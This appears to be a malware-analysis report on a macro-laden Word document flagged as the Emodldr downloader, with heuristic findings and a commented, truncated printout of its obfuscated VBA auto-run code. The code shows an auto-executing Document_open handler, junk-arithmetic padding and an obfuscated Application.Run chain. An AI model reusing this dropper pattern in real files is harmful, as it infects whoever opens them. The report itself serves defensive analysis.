Malware Insights
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands. The 'Document_Open' macro indicates that the malicious code executes automatically when the document is opened. The ClamAV detection further confirms its malicious nature, identifying it as Emodldr, a known downloader family. The VBA script is heavily obfuscated, but the Shell() call, taken together with the Emodldr downloader classification, strongly suggests it is designed to download and execute a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELL — Shell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42827 bytes |
| SHA-256: 2c0dc1e20fe1bd441cdc259d21e6508bef9c537453b1b9bf94536e9fcb3a3d3a | | | |
Preview script — first 1,000 lines of the extracted script
' Module metadata emitted by olevba for the first extracted module ("SoBcHZvRo").
' VB_Base = "1Normal.ThisDocument" together with VB_PredeclaredId = True looks like
' the document's ThisDocument class module, which is where an auto-run
' Document_open handler (present further down in this module) is picked up by Word.
Attribute VB_Name = "SoBcHZvRo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' MQTMv: a single assignment to iltCI, which is not read anywhere in this preview;
' the LparOD parameter is never used and the operands iuOqr, QrGiVG, jQjcsh and
' WqSQC are never assigned here. No caller of MQTMv is visible in the preview.
' This reads as filler/junk code meant to bloat the module and hinder static review.
' Note CByte(78855) exceeds the Byte range (0-255); with no On Error handler in this
' Sub, that overflow would presumably surface as a runtime error in the caller.
Sub MQTMv(LparOD)
iltCI = 98511 - CDbl(68162 / Int(78040) - 30709 / Round(15114 / CSng(63256 - CByte(78855)))) * iuOqr * Fix(6838) - 4380 / CByte(QrGiVG) / jQjcsh - CBool(5514) / WqSQC / Atn(27750)
End Sub
' ImXfzQ: three filler assignments (nTnsEF, UYjkcX, OPjmIM); none of the targets is
' read anywhere in this preview, the jAKBDS parameter is unused, and the free
' variables in each expression are never assigned. No caller is visible. Same
' junk-arithmetic pattern as the other unused Subs in this module.
Sub ImXfzQ(jAKBDS)
nTnsEF = 98635 - CDbl(52991 / Int(8990) - 94047 / Round(66360 / CSng(60678 - CByte(85444)))) * zYnzkU * Fix(67206) - 37969 / CByte(qHOIj) / RqikIi - CBool(45641) / XwJwjh / Atn(51719)
UYjkcX = 4370 - CDbl(37014 / Int(95714) - 21217 / Round(38418 / CSng(15459 - CByte(93343)))) * pwSwnG * Fix(7544) - 90296 / CByte(IbsPAa) / Cmkum - CBool(81376) / wDuoL / Atn(74668)
OPjmIM = 58769 - CDbl(70505 / Int(89305) - 39401 / Round(85861 / CSng(48464 - CByte(77216)))) * IjHBsa * Fix(16879) - 65063 / CByte(CwzYV) / sSsImu - CBool(23288) / drOtR / Atn(84049)
End Sub
' BNCzo: two filler assignments (rjnJnJ, wAQst) to variables that are not read in
' this preview; the mmSMo parameter is unused and no caller is visible.
' Junk arithmetic of the same shape as the rest of the module's padding.
Sub BNCzo(mmSMo)
rjnJnJ = 84117 - CDbl(2830 / Int(4448) - 140 / Round(32835 / CSng(2722 - CByte(62663)))) * aiJihr * Fix(81013) - 15366 / CByte(kzbhZ) / fZvwN - CBool(38812) / piakZq / Atn(25911)
wAQst = 15779 - CDbl(55105 / Int(77906) - 60674 / Round(94954 / CSng(82343 - CByte(69116)))) * DMMbSv * Fix(43730) - 50556 / CByte(DTczo) / DzRzuz - CBool(77102) / KpjwCl / Atn(30610)
End Sub
' Document_open: the auto-run handler Word fires when the document is opened — this
' is the code path behind the OLE_VBA_DOCOPEN finding. It is the only visible entry
' point in this preview; the filler Subs around it are never called from here.
Private Sub Document_open()
' Suppress every runtime error (including the CByte overflows in the filler lines
' below), so the padding cannot abort execution before Application.Run.
On Error Resume Next
' Filler: WkzmV is not read anywhere in this preview.
WkzmV = 27397 - CDbl(15708 / Int(14732) - 90781 / Round(82180 / CSng(52071 - CByte(52001)))) * zQvTAk * Fix(66293) - 61635 / CByte(pfPPBm) / wTpFCw - CBool(84326) / CGpoJ / Atn(9012)
' The real action. The macro name is assembled at runtime around the literal
' "uPwzOlpujUVu"; YNwMY and iCAhUf are never assigned in this preview, so if they are
' Empty the name is just the literal. Evaluating the argument calls MsFjFZjDfboS(),
' the Function defined later in the listing (it passes an obfuscated-looking string
' to TQwJqV, a helper not in the preview); RXFMVV and WmVvAY are likewise unassigned.
' The target macro "uPwzOlpujUVu" is outside the preview, as is any Shell() call —
' the OLE_VBA_SHELL finding must come from code beyond the truncated portion.
Application.Run YNwMY + "uPwzOlpujUVu" + iCAhUf, RXFMVV + MsFjFZjDfboS + WmVvAY
' Trailing filler: QuvtWm is not read anywhere in this preview.
QuvtWm = 72388 - CDbl(14226 / Int(3847) - 32461 / Round(78523 / CSng(26735 - CByte(2665)))) * RoYhR * Fix(94292) - 67000 / CByte(AdTnGj) / rDMAoO - CBool(14186) / nwtJJ / Atn(40870)
End Sub
' XHUjFz: three filler assignments (ZifEU, HcuOMi, ZAAHbJ); none is read in this
' preview, the NjbMlu parameter is unused, and no caller is visible. Padding only.
Sub XHUjFz(NjbMlu)
ZifEU = 19793 - CDbl(25027 / Int(54853) - 25255 / Round(24481 / CSng(7079 - CByte(19878)))) * kjYnYK * Fix(21316) - 10481 / CByte(TZbpu) / cZbcMm - CBool(26805) / NEoKc / Atn(90520)
HcuOMi = 21807 - CDbl(75591 / Int(76879) - 52484 / Round(68307 / CSng(24720 - CByte(26427)))) * GdfPW * Fix(99190) - 76006 / CByte(azwWTK) / kzjKRL - CBool(94005) / ahMRmn / Atn(2939)
ZAAHbJ = 90925 - CDbl(10517 / Int(91330) - 12985 / Round(43585 / CSng(3840 - CByte(94833)))) * qKADD * Fix(54154) - 931 / CByte(vDJwE) / KhBzZU - CBool(43489) / SDIaD / Atn(56871)
End Sub
' LpujJ: one filler assignment to EzziE, which is not read in this preview; the
' BQijZc parameter is unused and no caller is visible. Padding only.
Sub LpujJ(BQijZc)
EzziE = 25928 - CDbl(90723 / Int(26003) - 10635 / Round(48719 / CSng(55109 - CByte(55788)))) * UswvdY * Fix(44059) - 76136 / CByte(OOMvqI) / SNzrz - CBool(34306) / FdWqi / Atn(2633)
End Sub
' PSGOX: two filler assignments (TjjSIX, pUSVm) to variables not read in this
' preview; the TmGBF parameter is unused and no caller is visible. Padding only.
Sub PSGOX(TmGBF)
TjjSIX = 73970 - CDbl(93327 / Int(74521) - 22592 / Round(55164 / CSng(72075 - CByte(91884)))) * WrSGh * Fix(77911) - 73509 / CByte(wwGjSz) / jGwlPw - CBool(73541) / LNTvE / Atn(36370)
pUSVm = 55583 - CDbl(38925 / Int(398) - 36770 / Round(33374 / CSng(95554 - CByte(78509)))) * nLbEnz * Fix(12932) - 9248 / CByte(zjEkUH) / OshMuG - CBool(71904) / zMULG / Atn(61149)
End Sub
' Start of the second extracted module ("RJBjzmOIFM"). The Function MsFjFZjDfboS
' that Document_open evaluates as an Application.Run argument is defined below in
' this module (the preview is truncated partway through it).
Attribute VB_Name = "RJBjzmOIFM"
' LVmRCI: one filler assignment to jaNHaf, which is not read in this preview; the
' HEYQc parameter is unused and no caller is visible. Same junk pattern as module 1.
Sub LVmRCI(HEYQc)
jaNHaf = 90256 - CDbl(96288 / Int(96102) - 60579 / Round(28988 / CSng(90278 - CByte(66770)))) * IGAjcz * Fix(91213) - 90183 / CByte(cjKLw) / bvBjLD - CBool(48000) / HhZRB / Atn(26558)
End Sub
Function MsFjFZjDfboS()
On Error Resume Next
NKGzNb = 38657 - CDbl(60735 / Int(86833) - 75701 / Round(40796 / CSng(59621 - CByte(67504)))) * swUtK * Fix(67342) - 98748 / CByte(MRsUh) / nNsVr - CBool(30128) / jNGpqP / Atn(57415)
wQJRvXIJbM = TQwJqV("YhIzWsnOWsdX4+dX4+dX4+dX4OWseOdX4+dX4WdX4+dX4sdX4+dX4+dX4+dX4OWdX4+dX4sw-objecOdXvuP", GTOrHj - GTOrHj + 5 + GTOrHj - GTOrHj, GTOrHj - GTOrHj + 77 + GTOrHj - GTOrHj)
aDMfS = 93600 - CDbl(97886 / Int(27852) - 39958 / Round(44674 / CSng(15015 - CByte(85317)))) * zoHsuL * Fix(84866) - 60729 / CByte(znTPLj) / EUTVJ - CBool(71915) / jpPMo / Atn(98258)
UbSXi = 63770 - CDbl(30721 / Int(9918) - 12699 / Round(91746 / CSng(32914 - CByte(11644))
... (truncated)